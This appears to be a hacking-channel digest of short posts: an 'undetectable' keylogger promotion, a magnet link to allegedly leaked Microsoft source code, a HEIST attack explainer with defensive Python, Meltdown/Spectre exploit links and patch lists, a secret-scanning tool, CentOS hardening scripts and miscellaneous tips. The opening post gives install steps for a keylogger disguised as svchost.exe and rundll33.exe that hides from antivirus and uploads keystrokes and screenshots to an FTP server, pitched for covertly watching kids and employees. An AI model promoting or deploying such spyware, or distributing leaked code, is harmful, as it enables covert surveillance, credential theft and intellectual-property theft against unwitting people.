UNDERCODE SECURITY
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑UNDETECTABLE KEYLOGGER VIA IMAGE 2020 UPDATE since 2 years :

Keylogger is a 100% invisible keylogger, not only for users but also undetectable by antivirus software. Keylogger monitors all keystrokes and mouse clicks. It has a separate process which continuously captures system screenshots and sends them to an FTP server at a given interval.

F E A T U R E S :

1) Discrete/Tamper Proof: By design, Advance Keylogger is undetectable and thus cannot be tampered with or removed by kids/employees (who are often tech savvy). It does not appear in the Registry, the Process List, the System Tray, the Task Manager, on the Desktop, or in Add/Remove Programs.

2) Keystrokes Typed: See every keystroke typed even if it is deleted. This keystroke logger feature provides a reader-friendly version of all keystrokes logged along with the raw keylogging activity so you can see every detail.

3) Continuous Screenshots: Video-style playback of screenshots for programs and websites selected by you. For example, watch an email as it's being typed and edited instead of just seeing the finished product (1,000 screenshots included with purchase).

4) FTP Server: The screenshots and the keylogger logfile, which contain sensitive user information, are sent to an FTP server (Mobile/Web/System). The FTP server is also written in core Visual C++.

5) AutoStart: The keylogger can auto-execute on system boot. It inserts an entry in the system startup programs while it is running.

6) AutoCopy: The keylogger automatically copies itself into the %appdata%/roaming/wpdnse/ folder.


INSTALLATION & RUN :

1) download https://github.com/ajayrandhawa/Keylogger

2) Now you have two main files:

Keylogger.Zip Contain two Executable Files. (Sourcecode File Also Included)

a) svchost.exe (Main Keylogger Process)

b) rundll33.exe (Capture Screenshot & send all Log and Screenshot to FTP Server (ftp://192.168.8.2:2121))

3) Execute both files once; from then on they start automatically and capture screenshots and keylogs.

4) These names Given for unrecognisable in Task Manager.

🧜‍♀️How to Use ?

5) Start FTP Server on This Ip Address 192.168.8.2:2121
and Start both program and Enjoy
- USE FOR LEARN ONLY !!!

»» IF YOU A SUPER BEGINER, CHECK MORE INFO https://github.com/ajayrandhawa/Keylogger««



@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HTTPS encryption is also cracked: the HEIST attack obtains plaintext from encrypted data :
#fastTips

We all know the difference between HTTP and HTTPS. We usually assume encrypted HTTPS is relatively safe, but today we are going to talk about a web attack that bypasses HTTPS encryption to obtain plaintext information. Whether this news makes you happy or sad, I don't know.

1) The conditions for the use of the HEIST attack are very simple, requiring only a few lines of simple javascript code, and no man-in-the-middle attack is required. First, the transmitted sensitive data will be captured and saved. This attack method can obtain private sensitive information such as bank card number, real name, phone number, and social security number.

2) But as we all know, most of these data are encrypted by HTTPS. Then make a probe on the size and length of the encrypted data. Many websites use file compression technology to increase the loading speed of web pages, and attackers can just use the design flaws to decrypt the data payload (similar to BREACH attacks and CRIME attacks).

3) HEIST technology can use new APIs (Resource Timing and Fetch) to calculate the number of transmission frames and windows sent by the target host. Throughout the process, researchers can use a piece of JavaScript code to determine the actual size of the HTTPS response message. Then, the malicious HEIST code can cooperate with the BREACH technology to extract the encrypted information from the user's request data.

4) security researchers will demonstrate how to use malicious advertisements on the New York Times official website to accurately measure the size of the encrypted response information. Throughout the process, security researchers will use a virtual third-party website (targetwebsite.com) to send encrypted information. In addition, they will also demonstrate how to infer data information from security tokens used to prevent cross-site request forgery attacks.

5) Although some websites currently deploy basic security measures, most of them cannot prevent HEIST attacks, so this type of attack may become more frequent in recent years. The current prevention methods for HEIST attacks are to either disable third-party cookies or javascript scripts. But third-party cookies and javascript are the basic requirements for ordinary users to access the web, so the two researchers also hope to find and develop a reasonable and effective solution together through the Black Hat conference.
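As an added illustration (example code written for this page, not part of the original post or of the HEIST research), the following Python shows both halves of the security point above from the defender's side: why the compressed length of a response reveals whether attacker-influenced text matches a secret placed on the same page, and how per-response token masking (the approach frameworks such as Django and Rails use for CSRF tokens) removes the stable byte pattern that a size probe depends on. The HTML page, the `csrftoken` field and the token values are constructed samples.

```python
import base64
import os
import zlib

# Constructed 16-character token; a real one would come from the session store.
SECRET = "4f9a2c8e1b7d6e3a"


def page_with(token_field: str, reflected: str) -> bytes:
    """Constructed response body: a hidden token plus text reflected from the request.
    Stands in for a real page; the field name and layout are assumptions."""
    return (
        "<html><body>"
        f'<input type="hidden" name="csrftoken" value="{token_field}">'
        f"<p>Search results for: {reflected}</p>"
        "</body></html>"
    ).encode()


def compressed_size(body: bytes) -> int:
    """Length after DEFLATE, the compression applied by gzip/deflate content encoding."""
    return len(zlib.compress(body, 9))


def length_leaks(token_field: str, right: str, wrong: str) -> bool:
    """True when the compressed size alone tells a correct prefix guess from a wrong one.
    That size is exactly what HEIST measures from JavaScript, without decrypting anything:
    a matching prefix is encoded as a back-reference, a non-matching one as literals."""
    size_right = compressed_size(page_with(token_field, f"csrftoken={right}"))
    size_wrong = compressed_size(page_with(token_field, f"csrftoken={wrong}"))
    return size_right < size_wrong


def mask_token(token: bytes) -> str:
    """Mitigation: XOR the token with a fresh one-time pad on every response and send
    pad||ciphertext. The true token never appears in the body, so no reflected guess
    can share a byte pattern with it and the compression side channel has nothing to match."""
    pad = os.urandom(len(token))
    masked = bytes(a ^ b for a, b in zip(token, pad))
    return base64.urlsafe_b64encode(pad + masked).decode()


def unmask_token(field: str) -> bytes:
    """Server side: split pad and ciphertext and recover the token for comparison."""
    raw = base64.urlsafe_b64decode(field)
    pad, masked = raw[: len(raw) // 2], raw[len(raw) // 2:]
    return bytes(a ^ b for a, b in zip(pad, masked))


if __name__ == "__main__":
    print("plain token leaks via length:", length_leaks(SECRET, "4f9a2c8e", "5d07b4c6"))
    m1, m2 = mask_token(SECRET.encode()), mask_token(SECRET.encode())
    print("masked forms differ per response:", m1 != m2)
    print("server still recovers the token:", unmask_token(m1) == SECRET.encode())
```

With the masked form, `page_with(mask_token(...), guess)` contains no copy of the real token, so a reflected prefix guess has nothing to match against and response compression can stay enabled; this is why token masking, rather than switching compression off or blocking JavaScript, became the usual answer to BREACH-style probing.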

▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
DOWNLOAD THE REAL LEAKED SOURCE CODE FROM MICROSOFT :
(TORRENT LINK)

magnet:?xt=urn:btih:3d8b16242b56a3aafb8da7b5fc83ef993ebcf35b&dn=Microsoft%20leaked%20source%20code%20archive_2020-09-24&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2f9.rarbg.me%3a2850%2fannounce&tr=udp%3a%2f%2f9.rarbg.to%3a2920%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The recent vulnerabilities in the architecture of Intel, AMD and ARM processors:

1) How fortunate that critical vulnerabilities in the architecture of Intel, AMD and ARM processors were published while we were resting.

2) We did not have time to change the equipment, as recommended by US-CERT, as it turned out that it was enough to update the operating systems.

3) Well, the manufacturers had time to release updates.

So, what is the bottom line at the moment?

4) There are two vulnerabilities - Meltdown ("Crash") and Spectre ("Ghost").

5) Meltdown allows you to break the barrier between applications and the internal memory of the operating system, which opens access to data stored in the memory of the OS.

Detailed description https://meltdownattack.com/meltdown.pdf.

6) Well, there are also exploits, for example: https://github.com/paboldin/meltdown-exploit.

7) Spectre breaks memory isolation between applications themselves: conventionally, one service can crawl into the memory of another.

Description https://spectreattack.com/spectre.pdf. They say exploiting the vulnerability is more difficult, but there are still exploits: https://github.com/crozone/SpectrePoC, https://github.com/Eugnis/spectre-attack.

In general, a nightmare! Update, definitely!

8) Fears of a 30% performance loss are not justified in practice.

🦑Microsoft:

Windows Server 2008 R2 Service Pack 1, Windows 7 Service Pack 1 - KB4056897 or KB4056894
Windows Server 2012 Standard - KB4056899 or KB4056896
Windows 8.1, Windows Server 2012 R2 Standard - KB4056898 or KB4056895
Windows 10 Enterprise - KB4056893
Windows 10 Version 1607, Windows Server 2016 , Windows 10 Mobile - KB4056890
Windows 10 Version 1703 - KB4056891
Windows 10 version 1709 - KB4056892

There may be problems installing the patch due to the antivirus.

A list of antiviruses that block the patch has been provided: BitDefender, Carbon Black, Cisco, CrowdStrike, Cylance, Cyren, Endgame, Fortinet, G-DATA, McAfee, Nyotron, Palo-Alto, SentinelOne, Sophos, Trend Micro, VIPRE, Webroot.

9) Modifying or creating the following registry key may help resolve the issue:

Key="HKEY_LOCAL_MACHINE"
Subkey="SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat"
Value Name="cadca5fe-87d3-4b96-b7fb-a231484277cc"
Type="REG_DWORD"
Data="0x00000000"

Briefly on performance: tests with the Windows 10 update showed a decrease in various performance parameters of 1-2%.

Details: http://www.guru3d.com/articles-pages/windows-vulnerability-cpu-meltdown-patch-benchmarked.html.

🦑Linux:

Everything is simple, you need a kernel 4.14.12, 4.9.75 or 4.4.110. There are no updates for other branches, but they have a bunch of other unpatched vulnerabilities, so they are not recommended for use.

🦑Apple:

Meltdown has been fixed in iOS 11.2, macOS 10.13.2, and tvOS 11.2. No update is required for watchOS.
Spectre, Apple claims, is only practically exploitable via JavaScript in a web browser, so they will keep Safari updated. This patch, as well as the Axis Spectre patches, are pending.

🦑Google:

Android with the patch from 2018-01-05 is protected.
Chrome 64 adds Spectre protection, but is set to release on January 23rd. For now, if you wish, you can enable Site Isolation to protect against attacks.

🦑Firefox:

Mozilla has provided a browser-based patch to prevent Spectre from being used in version 57 of Firefox.

🦑Cisco:

Just doing analysis and getting ready to release patches.

Status here: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180104-cpusidechannel

▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Build your first Microservices application using Go and gRPC (Golang)
https://mega.nz/#F!04RDjIoS!AA4LPg9G3uK1zUXRN5K1VQ
▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is DataOps ?

The demand for information products and access to information resources is growing exponentially.

Today's data management platforms and data platform teams cannot meet the demand for DevOps-enabled products.

DataOps is a practice in which analysts, data scientists, developers, and administrators participate together throughout the entire service lifecycle from design to development and production support.

The goal of DataOps in the enterprise is to truly increase the speed of analysis and generate analytic results for data consumers.

As with DevOps, automation is a key tenet in DataOps, but in the past, data has not been used much for extreme automation.

So using DataOps will help you compete in analytics that will drive competition in the coming years.

DataOps professional responsibilities:

1) Providing access to multiple data sources

2) Facilitate testing and monitoring of data management processes

3) Data model creation and data versioning

4) Data quality, security, privacy, storage management

5) Data infrastructure management and deployment

6) Setting standards, processes and methodology for a data analytics product

▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New Update: DumpTheGit searches through public repositories to find sensitive information uploaded to GitHub repositories.

The tool flags matches for potentially sensitive files such as credentials, secret keys, tokens, etc. which have been accidentally uploaded by developers. DumpTheGit only requires your GitHub access token to fetch the information.

INSTALLATION & RUN :

1) Download or clone https://github.com/Securityautomation/DumpTheGit

2) Move the repository's files into your web server (for example Tomcat, XAMPP, LAMP, the default macOS Apache, etc.).

3) Open index.html to access the tool.

▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

πŸ¦‘πŸ§CentOS Server Security Tips :

1) Disable unnecessary commands SUID and SGID
If the setuid and setgid bits are set in binaries, these commands can run tasks with other user or group privileges, such as root privilege, which can lead to serious security problems.

2) Often, buffer overflow attacks can exploit these executables to run unauthorized code as root.

# find / -path /proc -prune -o -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \;

3) To clear the setuid bit, run the following command:

# chmod u-s /path/to/binary_file

4) To clear the setgid bit, run the following command:

# chmod g-s /path/to/binary_file

5) Check for unknown files and directories
Files or directories not owned by an existing account must be removed or user and group rights assigned.

6) Run the below find command to list files or directories without users and groups.

# find / -nouser -o -nogroup -exec ls -l {} \;

7) List world-writable files
Keeping a writable file on the system can be dangerous because anyone can change it.

8) Run the command below to display writable files other than symbolic links which are always writable to everyone.

# find / -path /proc -prune -o -perm -2 ! -type l -ls
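As an added example (written for this page, not from the original post), here is a Python auditor that performs the three checks from items 1-8 above in a single pass: setuid/setgid regular files, files whose owner or group no longer exists, and world-writable entries, skipping symlinks and pruning /proc, /sys and /dev the way the find commands do. The `build_sample_tree` fixture and its file names are constructed for demonstration; the ownership lookups are injectable so the orphaned-file case can be exercised without root.

```python
import grp
import os
import pwd
import stat
import sys
import tempfile


def _uid_exists(uid: int) -> bool:
    try:
        pwd.getpwuid(uid)
        return True
    except KeyError:
        return False


def _gid_exists(gid: int) -> bool:
    try:
        grp.getgrgid(gid)
        return True
    except KeyError:
        return False


def audit_tree(root, prune=("/proc", "/sys", "/dev"),
               uid_exists=_uid_exists, gid_exists=_gid_exists):
    """Walk root once and bucket every entry that matches one of the checks.
    prune plays the role of '-path /proc -prune'; the lookup callables default to
    the passwd/group databases and can be swapped for testing."""
    findings = {"setuid": [], "setgid": [], "orphaned": [], "world_writable": []}
    for dirpath, dirnames, filenames in os.walk(root):
        # Edit dirnames in place so os.walk never descends into pruned trees.
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in prune]
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            mode = st.st_mode
            if stat.S_ISLNK(mode):
                continue  # symlinks are always 0777; their target is checked on its own
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                findings["setuid"].append(path)
            if stat.S_ISREG(mode) and mode & stat.S_ISGID:
                findings["setgid"].append(path)
            if not uid_exists(st.st_uid) or not gid_exists(st.st_gid):
                findings["orphaned"].append(path)
            if mode & stat.S_IWOTH:
                findings["world_writable"].append(path)
    return findings


def build_sample_tree():
    """Constructed fixture: a temp dir with one file per condition, a clean file,
    and a symlink to the writable file (which must not be reported)."""
    root = tempfile.mkdtemp(prefix="audit-demo-")
    paths = {}
    for key, mode in (("setuid", 0o4755), ("setgid", 0o2755),
                      ("world_writable", 0o666), ("clean", 0o644)):
        path = os.path.join(root, key)
        with open(path, "w"):
            pass
        os.chmod(path, mode)
        paths[key] = path
    paths["symlink"] = os.path.join(root, "link-to-writable")
    os.symlink(paths["world_writable"], paths["symlink"])
    return root, paths


if __name__ == "__main__":
    # With a path argument, audit that tree (run as root for a full system view);
    # without one, audit the constructed sample tree.
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()[0]
    for category, hits in audit_tree(root).items():
        print(f"{category}: {len(hits)}")
        for hit in hits:
            print("   ", hit)
```

The find one-liners above remain the quickest interactive equivalent; the script is for when the results should be collected in one structure, for example to diff against a known-good baseline after each package update.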

9) Create strong passwords
Create a password that is at least eight characters long.

Password must contain numbers, special characters and capital letters.

Use pwmake to generate a 128-bit password from /dev/urandom.

# pwmake 128

10) Implement a strong password policy
Force the system to use strong passwords by adding the following line to the /etc/pam.d/passwd file:

password required pam_pwquality.so retry=3
By adding this line, you enter a policy where the entered password cannot contain more than 3 characters in a monotone sequence, for example abcd, and more than 3 identical consecutive characters, for example 1111.

11) To force users to use a password that is at least 8 characters long, including all character classes, sequential character checking, add the following lines to the /etc/security/pwquality.conf file:

minlen = 8
minclass = 4
maxsequence = 3
maxrepeat = 3
Use password aging
The chage command can be used to control the age of a user's password.

To set the age of a user's password to 45 days, use the following command:

# chage -M 45 username
To disable password expiration use the command:

# chage -M -1 username
Force password expiration (user must change password at next login):
# chage -d 0 username

12) Blocking accounts
User accounts can be locked out by running passwd or usermod command:

# passwd -l username
# usermod -L username
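The following is an added Python check (written for this page, not from the original post) that verifies items 9-12 above against copies of the relevant files: it parses pwquality.conf and reports values weaker than the stated policy (treating the default 0 for maxsequence/maxrepeat as "check disabled"), confirms the pam_pwquality line is present in /etc/pam.d/passwd, and classifies /etc/shadow entries by lock state, empty password, forced change, and maximum age above 45 days. All sample file contents below are constructed.

```python
import re
import sys

# Policy stated in the tips above: at least 8 chars, all 4 character classes,
# no run of more than 3 sequential or 3 identical characters, max age 45 days.
POLICY = {"minlen": 8, "minclass": 4, "maxsequence": 3, "maxrepeat": 3}
MAX_DAYS = 45
PAM_PWQUALITY = re.compile(r"^\s*password\s+(required|requisite)\s+pam_pwquality\.so\b")

# Constructed samples standing in for the real files.
SAMPLE_PWQUALITY = """# /etc/security/pwquality.conf (constructed)
minlen = 8
minclass = 4
maxsequence = 3
maxrepeat = 3
"""
WEAK_PWQUALITY = "minlen = 6\nminclass = 2\n"  # maxsequence/maxrepeat left at default 0
SAMPLE_PAM = ("password required pam_pwquality.so retry=3\n"
              "password sufficient pam_unix.so sha512 shadow use_authtok\n")
SAMPLE_SHADOW = """root:$6$constructedhash:18600:0:99999:7:::
alice:$6$constructedhash:18600:0:45:7:::
bob:!$6$constructedhash:18600:0:45:7:::
carol:$6$constructedhash:0:0:45:7:::
dave::18600:0:45:7:::
erin:$6$constructedhash:18600:0::7:::
"""


def parse_pwquality(text: str) -> dict:
    """Parse 'key = value' lines, ignoring comments and blanks; numbers become ints."""
    values = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if "=" not in line:
            continue
        key, _, val = line.partition("=")
        val = val.strip()
        values[key.strip()] = int(val) if re.fullmatch(r"-?\d+", val) else val
    return values


def pwquality_findings(values: dict) -> list:
    """Return one message per setting weaker than POLICY."""
    out = []
    for key in ("minlen", "minclass"):
        if values.get(key, 0) < POLICY[key]:
            out.append(f"{key}={values.get(key, 'unset')} (policy: >= {POLICY[key]})")
    for key in ("maxsequence", "maxrepeat"):
        have = values.get(key, 0)
        # pwquality treats 0 as 'check disabled', so unset or 0 is a finding too
        if have == 0 or have > POLICY[key]:
            out.append(f"{key}={have} (policy: 1..{POLICY[key]})")
    return out


def pam_enforces_pwquality(pam_passwd_text: str) -> bool:
    """True when /etc/pam.d/passwd carries the pam_pwquality line from item 10."""
    return any(PAM_PWQUALITY.match(line) for line in pam_passwd_text.splitlines())


def shadow_findings(shadow_text: str, max_days: int = MAX_DAYS) -> dict:
    """Classify shadow entries. Field order: name:hash:lastchange:min:max:warn:inactive:expire:flag.
    passwd -l / usermod -L lock by prefixing the hash with '!'; chage -d 0 sets lastchange=0;
    chage -M -1 leaves max empty."""
    out = {"locked": [], "empty_password": [], "must_change": [], "no_expiry": []}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 5:
            continue
        user, pw_hash, lastchange, _min_days, max_age = fields[:5]
        if pw_hash.startswith("!"):
            out["locked"].append(user)
        elif pw_hash == "":
            out["empty_password"].append(user)
        if lastchange == "0":
            out["must_change"].append(user)
        if max_age == "" or int(max_age) < 0 or int(max_age) > max_days:
            out["no_expiry"].append(user)
    return out


if __name__ == "__main__":
    # With three file paths given (pwquality.conf, pam.d/passwd, shadow), check those;
    # otherwise run on the constructed samples.
    if len(sys.argv) == 4:
        pwq, pam, shadow = (open(p).read() for p in sys.argv[1:4])
    else:
        pwq, pam, shadow = SAMPLE_PWQUALITY, SAMPLE_PAM, SAMPLE_SHADOW
    print("pwquality findings:", pwquality_findings(parse_pwquality(pwq)) or "none")
    print("pam_pwquality enforced:", pam_enforces_pwquality(pam))
    print("shadow:", shadow_findings(shadow))
```

Reading /etc/shadow needs root, so run it on the box with sudo or feed it a copy; the classification is deliberately per user so that service accounts which legitimately have no expiry can be filtered from the report.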

▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Merge Fonts Using FontForge in LINUX

1) Create a new file named “mergefonts.sh” and paste the following code in it:

#!/usr/bin/fontforge
Open($1)
SelectAll()
ScaleToEm(1024)
Generate("1.ttf")
Close()
Open($2)
SelectAll()
ScaleToEm(1024)
Generate("2.ttf")
Close()
Open("1.ttf")
MergeFonts("2.ttf")
Generate("my_custom_font.ttf")
Close()

2) The code is pretty straightforward. The “$1” argument is your primary font and the “$2” argument is your secondary font. Fonts are first scaled to a uniform size and then merged to generate a new font. If you do not scale them to a common size, you may get uneven text rendering from the final merged font.

3) To check the size of a font in “em” units, run the command below (replace “font.ttf” with the name of your own font file):

$ fontforge -lang=ff -c 'Open($1); Print($em); Close()' font.ttf

4) You will get some output like this:

The glyph named f_i is mapped to U+F001.
But its name indicates it should be mapped to U+FB01.
2048

5) Change the “ScaleToEm(1024)” lines in the script above to your desired value. You can also edit the script and add an extra “$3” argument to specify the size value from the command line.

6) Now, to merge the two fonts, specify the fonts as arguments when running the “mergefonts.sh” script. The order of these arguments is important, as the font specified as the second argument ($2) will be merged into the font specified as the first argument ($1). The first argument should be the main font that you intend to use in your project. Put the “mergefonts.sh” script and the two fonts in a folder, launch a new terminal window from that folder and run the following command to merge the fonts:


$ ./mergefonts.sh font1.ttf font2.ttf

7) After running the script, you will find the new merged font as β€œmy_custom_font.ttf” in the working directory. You may see some warnings and errors in the terminal after running the command above. These errors won’t stop the merging process of the fonts. If they are simple warnings, you can ignore them. However, if there are conflicts and errors during the merging process, you may need to review them and fix them individually by manually modifying the glyphs in FontForge GUI app. It totally depends on the kind of fonts you choose for merging and you may not get any errors at all.

8) Note that the very first line in the script is the location of the FontForge binary as shebang. This allows you to directly run the script in the terminal without having to manually specify the FontForge command in the terminal. To check the location of FontForge binary in your system, run the command below:

$ which fontforge
Alternatively, you can run any FontForge script using the “-script” argument.

$ fontforge -script mergefonts.sh font1.ttf font2.ttf

▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑

1) Make sure your application is free of vulnerabilities.
The most dangerous threat to an application is its own vulnerabilities and flaws.

Make sure there are no known vulnerabilities in your application.

It can be as a web application, mobile application, or desktop application, and the vulnerability remediation will help prevent threats.

2) Consider testing the security of your application before shipping it to production.
To eliminate the vulnerability, you can conduct security testing of your applications.

Security testing doesn't slow down the development process.

Security testing helps you find and fix vulnerabilities in your application, as well as make your applications more efficient.

Therefore, consider checking the security of your applications before going into production.

3) Bug Bounty program
Many large companies such as Mozilla, Facebook, Yahoo!, Google, Reddit, Square, and Microsoft are organizing Bug Bounty programs to identify vulnerabilities in their applications.

This program allows your organization to find and fix bugs before they become known to the public or known hackers.

This way you can prevent incidents.

4) Train your organization on application security best practices.
You can also protect your apps by educating your employees about their security.

Knowledge of cybersecurity can help your organization counter the threats of your applications.

5) Use an automatic scanner to keep the application secure.
Scanning your entire application is also a good security measure.

Consider using an automated scanner to scan that will run tests daily.

You can also use vulnerability scanning tools that are automated.

Vulnerability scanning tools will search your applications for vulnerabilities such as cross-site scripting, SQL injection, command injection, path traversal, etc.

6) Think Before Using Open Source In Your Application
open source can be vulnerable.

Thus, using open source code in your application can leave your applications vulnerable to cyber attacks.

So think twice before using open source in your application.

7) Consider encrypting your application source code.
Source code encryption ensures that an attacker cannot gain access to the source code of your applications.

8) Penetration testing also helps protect your applications
Penetration testing is also known as a pentest.

Penetration testing is useful for protecting applications against cybercriminals.

▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is UChecker ?

1) UChecker, short for Userspace Checker, is a free open source scanner that detects which of your processes are still using outdated libraries and need to be restarted.

The tool was created by KernelCare during live patching development for shared libraries.

With Uchecker, you can identify vulnerable FOSS libraries and fix them.

2) You will have to reboot the affected processes (unless you are using the library update services without rebooting), but by scanning for vulnerabilities, you can determine which processes need attention and which do not.

3) As a result, you avoid unnecessary server reboots that lead to degraded service and / or crashes, as well as creating access vulnerabilities, since libraries are left unpatched until a reboot is scheduled.

4) In fact, you may not even know which services are using which libraries, so it is tempting to just reboot the server to update everything, or restart the core services.

5) This practice can be just as devastating as rebooting.

INSTALLATION & RUN :

1) https://github.com/cloudlinux/kcare-uchecker

2) # curl -s -L https://kernelcare.com/checker | python


▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Windows 10 update removes the need to remember passwords with Windows Hello and FIDO2:

Say goodbye to passwords
Microsoft knows what everyone thinks about passwords, noting that "no one likes passwords (except hackers)."

Since the advent of the computer systems that we all use, we have had to remember passwords - for computer systems, websites, applications, devices, and the like.

“People don't like passwords because we have to remember them,” Microsoft explained.

"As a result, we often create passwords that are easy to guess — making them the first target for hackers trying to gain access to your computer or network."

The need for confidentiality meant passwords for everything.

This increased need has led to different types of passwords.

Instead of your birthday, anniversary, dog name, street name, etc., you were forced to remember more complex passwords or have a password manager.


🦑Windows Hello and FIDO2 integration :

You can take advantage of Windows Hello with FIDO2 by updating Windows 10 to version 1903.

Microsoft Edge, Google Chrome and Mozilla Firefox will support biometrics and PINs.

Other Microsoft products such as Office 365, Skype, and Xbox Live can also authenticate using Windows Hello.

▁ ▂ ▄ U𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁